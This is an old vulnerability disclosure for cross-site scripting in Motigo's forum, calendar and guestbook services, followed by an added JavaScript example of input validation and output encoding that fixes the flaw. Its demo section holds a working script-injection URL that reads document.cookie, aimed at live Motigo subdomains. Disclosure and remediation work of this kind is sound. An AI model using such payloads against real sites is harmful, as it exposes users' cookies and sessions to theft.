Saturday, 28 January 2012

Motigo Forums/Calendar/Guestbook Cross Site Scripting

# Exploit Title: Motigo Forums/Calendar/Guestbook Cross Site Scripting
# Date: 28.01.2012
# Author: Sony

# Software Link: http://motigo.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/motigo-forumscalendarguestbook-cross.html
..................................................................


Calendar:

Create a calendar and add a new event: put the XSS code in the Notes field and save the event.

Demo:


http://36317.calendars.motigo.com/day/show/date/2012-01-28






Forums:

The XSS is in the email_send action, in the boarduser_id parameter.


http://94932.forums.motigo.com/?action=email_send&boarduser_id=[XSS code goes here]

Demo:

http://94932.forums.motigo.com/?action=email_send&boarduser_id=%22%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E




Guestbooks:

Put the XSS code in the Homepage field and press the Submit button.

Demo:


http://234402.guestbooks.motigo.com/?action=index
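
All three inputs above (the calendar Notes field, the forum boarduser_id parameter and the guestbook Homepage field) end up in the page without validation or output encoding. The sketch below is an added example, not part of the original post and not Motigo's code: the function names, the hidden-input markup and the assumption that boarduser_id is a numeric id are hypothetical.

```javascript
// Added example (hypothetical handler code, not Motigo's).
// Input: the demo query string quoted in the post above, shortened to one script tag.
const DEMO_URL = 'http://94932.forums.motigo.com/?action=email_send&boarduser_id=' +
  '%22%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E';

// Encode the five characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Assumption: boarduser_id is a numeric id. Accept digits only, otherwise null.
function parseBoardUserId(raw) {
  return typeof raw === 'string' && /^[0-9]{1,10}$/.test(raw) ? Number(raw) : null;
}

// Guestbook "Homepage" field: allow only absolute http(s) URLs, then encode for href.
function safeHomepageHref(raw) {
  let url;
  try { url = new URL(String(raw).trim()); } catch { return null; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return escapeHtml(url.href);
}

// Vulnerable shape: the parameter is concatenated into the attribute as-is.
function renderEmailFormUnsafe(rawId) {
  return `<input type="hidden" name="boarduser_id" value="${rawId}">`;
}

// Hardened shape: validate first, encode on output anyway.
function renderEmailFormSafe(rawId) {
  const id = parseBoardUserId(rawId);
  if (id === null) return '<p>Invalid user id.</p>';
  return `<input type="hidden" name="boarduser_id" value="${escapeHtml(id)}">`;
}

// Calendar "Notes" field (stored case): encode when the note is rendered.
function renderNote(note) {
  return `<p class="note">${escapeHtml(note)}</p>`;
}

const demoId = new URL(DEMO_URL).searchParams.get('boarduser_id');
console.log(renderEmailFormUnsafe(demoId)); // script tag lands in the markup
console.log(renderEmailFormSafe(demoId));   // request rejected
console.log(renderNote(demoId));            // rendered as inert text
```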
